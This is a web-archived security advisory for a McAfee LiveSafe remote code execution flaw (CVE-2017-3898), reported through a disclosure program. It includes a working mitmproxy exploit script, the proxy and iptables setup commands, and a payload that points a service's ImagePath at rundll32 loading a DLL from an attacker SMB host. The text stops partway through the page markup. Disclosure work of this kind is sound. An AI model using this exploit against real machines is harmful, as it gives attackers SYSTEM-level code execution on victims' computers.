{"id":9160,"date":"2017-09-07T14:19:40","date_gmt":"2017-09-07T22:19:40","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/07\/news-2933\/"},"modified":"2017-09-07T14:19:40","modified_gmt":"2017-09-07T22:19:40","slug":"news-2933","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/09\/07\/news-2933\/","title":{"rendered":"SSD Advisory \u2013 McAfee LiveSafe MiTM Registry Modification leading to Remote Command Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 07 Sep 2017 06:14:58 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3248\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3248');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes a Remote Code Execution found in McAfee McAfee LiveSafe (MLS) versions prior to 16.0.3. The vulnerability allows network attackers to modify the Windows registry value associated with the McAfee update via the HTTP backend-response.<\/p>\n<p>McAfee Security Scan Plus is a free diagnostic tool that ensures you are protected from threats by actively checking your computer for up-to-date anti-virus, firewall, and web security software. It also scans for threats in any open programs.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security research company, Silent Signal, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released patches to address this vulnerability.<\/p>\n<p>For more information: <a href=\"https:\/\/service.mcafee.com\/webcenter\/portal\/cp\/home\/articleview?articleId=TS102714\" target=\"_blank\">https:\/\/service.mcafee.com\/webcenter\/portal\/cp\/home\/articleview?articleId=TS102714<\/a><\/p>\n<p>CVE: CVE-2017-3898<\/p>\n<p><span id=\"more-3248\"><\/span><\/p>\n<p><strong>Vulnerabilities Details<\/strong><br \/> An active network attacker can achieve remote code execution in multiple McAfee products. Affected products retrieve configuration data over plaintext HTTP channel from the <em>http:\/\/COUNTRY.mcafee.com\/apps\/msc\/webupdates\/mscconfig.asp<\/em> URL (where <em>COUNTRY<\/em> is a two letter country identifier, e.g. \u201cuk\u201d).<\/p>\n<p>The response body contains XML formatted data, similar to the following: <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59b1c5fbbae99429348718\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;webservice-response response-version=&#8221;1.0&#8243; frequency=&#8221;168&#8243;  verid=&#8221;1#1316#15#0#2&#8243;&gt;  &lt;update&gt;  &lt;reg key=&#8221;HKLMSOFTWAREMcAfeeMSCSettingsInProductTransaction&#8221;  name=&#8221;enable&#8221; type=&#8221;REG_DWORD&#8221; value=&#8221;1&#8243; obfuscate=&#8221;0&#8243;\/&gt;  &lt;\/update&gt;  &lt;\/webservice-response&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0009 seconds] -->  <\/p>\n<p>The response describes a Registry modification with the reg tags under the webservice-response\/update path.<\/p>\n<p>This request and subsequent update is triggered automatically, first upon the installation of the software then after the number of hours indicated by the frequency attribute of the webservice-request node (168 minutes by default). <\/p>\n<p>The update is executed by the <em>PlatformServiceFW.dll<\/em> of the <em>McSvHost.exe<\/em> process by invoking the <em>mcsvrcnt.exe<\/em> program with the <em>\/update<\/em> argument. The <em>McSvHost.exe<\/em> process is running with <em>SYSTEM<\/em> privileges that is inherited by <em>mcsvrcnt.exe<\/em> that implements the Registry change.<\/p>\n<p>As a result active network attackers can modify the server responses to write the Registry of the target with <em>SYSTEM<\/em> privileges.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> The exploit runs as a proxy that intercepts and modifies plaintext HTTP requests and responses. Since the target software performs certificate validation for HTTPS services it&#8217;s important to let these connections pass through without modification.<br \/> In regular HTTP proxy mode this can be achieved by using the <code><em>--ignore<\/em><\/code> command line parameter of mitmproxy:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59b1c5fbbaea3749065564\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> mitmproxy -s mcreggeli_inline.py &#8211;ignore &#8216;.*&#8217;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaea3749065564-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaea3749065564-1\"><span class=\"crayon-v\">mitmproxy<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mcreggeli_inline<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">py<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-i\">ignore<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;.*&#8217;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>In case of transparent proxy mode the above parameter should not be provided:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59b1c5fbbaea6999268819\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> mitmproxy -s mreggeli_inline.py \u2013T<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaea6999268819-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaea6999268819-1\"><span class=\"crayon-v\">mitmproxy<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mreggeli_inline<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">py<\/span><span class=\"crayon-h\"> <\/span>\u2013<span class=\"crayon-v\">T<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>For transparent proxy mode the following commands configure NAT and port redirection on common Debian-based Linux distributions (eth0 is the interface visible to the target, eth1 is connected to the internet):<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59b1c5fbbaea9909880874\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> iptables -t nat -A PREROUTING -i eth0 -p tcp   &#8211;dport 80 -j REDIRECT &#8211;to 8080  iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE  sysctl net.ipv4.ip_forward=1<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaea9909880874-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaea9909880874-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaea9909880874-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaea9909880874-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaea9909880874-1\"><span class=\"crayon-v\">iptables<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nat<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PREROUTING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">eth0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">tcp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaea9909880874-2\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-i\">dport<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">REDIRECT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8080<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaea9909880874-3\"><span class=\"crayon-v\">iptables<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nat<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">POSTROUTING<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">eth1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">MASQUERADE<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaea9909880874-4\"><span class=\"crayon-e\">sysctl <\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ipv4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ip_forward<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0009 seconds] -->  <\/p>\n<p>The script looks for the \u201c<em>mscconfig.asp<\/em>\u201d string in the request URL. If found the XML response body is deserialized, and new reg nodes are added based on the REG variable declared at the beginning of the script. The REG variable is a list of dictionaries, each dictionary containing the following keys:<\/p>\n<ul>\n<li>Key \u2013 The name of the Registry key to modify (e.g. \u201c<em>HKLMSYSTEMCurrentControlSetServicesmfevtp<\/em>\u201d, backslashes should be escaped properly for Python)<\/li>\n<li>Type \u2013 Type of the value to create (e.g. \u201c<em>REG_SZ<\/em>\u201d for strings)<\/li>\n<li>Name \u2013 Name of the value to create<\/li>\n<li>Value \u2013 Value to be created<\/li>\n<\/ul>\n<p>The exploit also changes the frequency attribute to 1 so re-exploitation can be performed in shorter time (in 1 hour) if needed. After the new nodes are inserted, the resulting object is serialized and put in place of the original response body.<\/p>\n<p>To demonstrate code execution one of the own service entries of the affected McAfee products (<em>mfevtp<\/em> \u2013 McAfee Process Validation Service) was overwritten: the <em>ImagePath<\/em> value of the <em>HKLMSYSTEMCurrentControlSetServicesmfevtp<\/em> key was replaced to point the built-in <em>rundll32.exe<\/em> with an <em>UNC<\/em> path argument pointing to the attacker host (The payload (test.dll) was served with Metasploit\u2019s <em>smb_delivery<\/em> module during testing):<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/McAfee.jpg\" data-slb-active=\"1\" data-slb-asset=\"1589572532\" data-slb-internal=\"0\" data-slb-group=\"3248\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/McAfee-300x56.jpg\" alt=\"\" width=\"300\" height=\"56\" class=\"alignnone size-medium wp-image-3250\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/McAfee-300x56.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/McAfee-768x145.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/McAfee-1024x193.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/McAfee.jpg 1392w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>The REG variable was declared like the following:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59b1c5fbbaeac245774527\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> REG=[{&#8220;key&#8221;:&#8221;HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp&#8221;, &#8220;type&#8221;:&#8221;REG_SZ&#8221;,&#8221;name&#8221;:&#8221;ImagePath&#8221;, &#8220;value&#8221;:&#8221;c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0&#8243;},]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeac245774527-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeac245774527-1\"><span class=\"crayon-v\">REG<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;key&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;REG_SZ&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;ImagePath&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;value&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0&#8221;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>In this way SYSTEM level command execution is triggered after the machine is restarted, the exploit was not caught by the McAfee software.<\/p>\n<p><u>mcreggeli_inline.py<\/u><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59b1c5fbbaeaf438183868\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python3  #  # HTTP proxy mode:  #  mitmproxy -s mcreggeli_inline.py &#8211;ignore &#8216;.*&#8217;   #  # Transparent proxy mode:   #   mitmproxy -s mcreggeli_inline.py -T &#8211;host  #    from mitmproxy import ctx, http  from lxml import etree    REG=[{&#8220;key&#8221;:&#8221;HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp&#8221;,&#8221;type&#8221;:&#8221;REG_SZ&#8221;,&#8221;name&#8221;:&#8221;ImagePath&#8221;,&#8221;value&#8221;:&#8221;c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0&#8243;},]    def response(flow):      if flow.request.scheme == &#8220;http&#8221; and &#8220;mscconfig.asp&#8221; in flow.request.url:          try:                     oxml=etree.XML(flow.response.content)              oxml.set(&#8220;frequency&#8221;,&#8221;1&#8243;)              update=oxml.xpath(&#8220;\/\/webservice-response\/update&#8221;)[0]              for r in REG:                  reg=etree.SubElement(update,&#8221;reg&#8221;)                  reg.set(&#8220;key&#8221;, r[&#8220;key&#8221;])                  reg.set(&#8220;type&#8221;, r[&#8220;type&#8221;])                  reg.set(&#8220;obfuscate&#8221;, &#8220;0&#8221;)                  reg.set(&#8220;name&#8221;, r[&#8220;name&#8221;])                  reg.set(&#8220;value&#8221;, r[&#8220;value&#8221;])              #ctx.log(etree.tostring(oxml))               flow.response.content=etree.tostring(oxml)              ctx.log(&#8220;[+] [MCREGGELI] Payload sent&#8221;)          except etree.XMLSyntaxError:              ctx.log(&#8220;[-] [MCREGGELI] XML deserialization error&#8221;)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" 